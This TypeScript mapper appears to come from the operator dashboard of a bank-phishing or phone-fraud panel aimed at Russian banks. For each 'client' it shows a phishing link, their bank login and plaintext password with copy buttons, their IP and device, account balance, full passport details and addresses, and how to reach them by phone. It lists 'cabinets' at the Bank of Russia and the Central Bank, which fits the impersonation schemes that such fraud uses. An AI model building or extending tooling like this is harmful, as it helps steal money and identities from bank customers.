import { CabinetFullInfo } from "../../../context/cabinet";
import { currencyTypeMapper, phoneTypeMapper } from "../../../utils/mappers";
import { ClientCabinetType } from '../../../enums/cabinetTypes'
import { shortDateFormat } from '../../../utils/time'

const CABINET_NAMES: Record<ClientCabinetType, string> = {
  [ClientCabinetType.SberBank]: 'Сбербанк',
  [ClientCabinetType.BankRossii]: 'Банк России',
  [ClientCabinetType.AlfaBank]: 'Альфа-Банк',
  [ClientCabinetType.TBank]: 'Т-Банк',
  [ClientCabinetType.VTB]: 'ВТБ',
  [ClientCabinetType.RaiffeisenBank]: 'Райффайзен Банк',
  [ClientCabinetType.CentralBank]: 'Центральный банк РФ',
} as const;

export const getCabinetName = (type: ClientCabinetType) => (
  CABINET_NAMES[type] ?? 'Неизвестный'
)

export const getMappetData = (cabinetInfo: CabinetFullInfo) => {
  return {
    bankInfo: [
      {
        label: 'Банк',
        value: getCabinetName(cabinetInfo.bank),
        canCopy: false
      },
      {
        label: 'Ссылка для клиента',
        value: cabinetInfo.clientLink,
        canCopy: true
      },
      {
        label: 'Логин',
        value: cabinetInfo.credentials.login,
        canCopy: true
      },
      {
        label: 'Пароль',
        value: cabinetInfo.credentials.password,
        canCopy: true
      },
    ],
    deviceInfo: [
      {
        label: 'IP',
        value: cabinetInfo.history?.ip ?? '-',
        canCopy: false
      },
      {
        label: 'Страна',
        value: cabinetInfo.history?.country ?? '-',
        canCopy: false
      },
      {
        label: 'Устройство',
        value: cabinetInfo.history?.device ?? '-',
        canCopy: false
      },
    ],
    balance: [
      {
        label: 'Сумма',
        value: cabinetInfo.balance?.value ?? '-',
        canCopy: false
      },
      {
        label: 'Валюта',
        value: cabinetInfo.balance?.currency ? currencyTypeMapper(cabinetInfo.balance.currency) : '-',
        canCopy: false
      },
    ],
    profile: [
      {
        label: 'ФИО',
        value: cabinetInfo.baseInfo.name,
        canCopy: false
      },
      {
        label: 'Телефон',
        value: cabinetInfo.baseInfo.phone,
        canCopy: false
      },
      {
        label: 'Дата рождения',
        value: shortDateFormat(cabinetInfo.baseInfo.birthDate),
        canCopy: false
      },
      {
        label: 'Серия паспорта',
        value: cabinetInfo.passport?.series ?? '-',
        canCopy: false
      },
      {
        label: 'Номер паспорта',
        value: cabinetInfo.passport?.number ?? '-',
        canCopy: false
      },
      {
        label: 'Орган выдачи',
        value: cabinetInfo.passport?.issuingAuthority ?? '-',
        canCopy: false
      },
      {
        label: 'Код подразделения',
        value: cabinetInfo.passport?.departmentCode ?? '-',
        canCopy: false
      },
      {
        label: 'Дата выдачи',
        value: cabinetInfo.passport?.issued ?? '-',
        canCopy: false
      },
      {
        label: 'Срок действия',
        value: cabinetInfo.passport?.validityPeriod ?? '-',
        canCopy: false
      },
      {
        label: 'Место регистрации',
        value: cabinetInfo.passport?.registrationAddress ?? '-',
        canCopy: false
      },
      {
        label: 'Место проживания',
        value: cabinetInfo.passport?.address ?? '-',
        canCopy: false
      },
    ],
    feedback: [
      {
        label: 'Номер телефона',
        value: cabinetInfo.feedback?.phoneNumber,
        canCopy: false
      },
      {
        label: 'Тип связи',
        value: cabinetInfo.feedback?.phoneType ? phoneTypeMapper(cabinetInfo.feedback.phoneType) : '-',
        canCopy: false
      },
    ],
  }

};
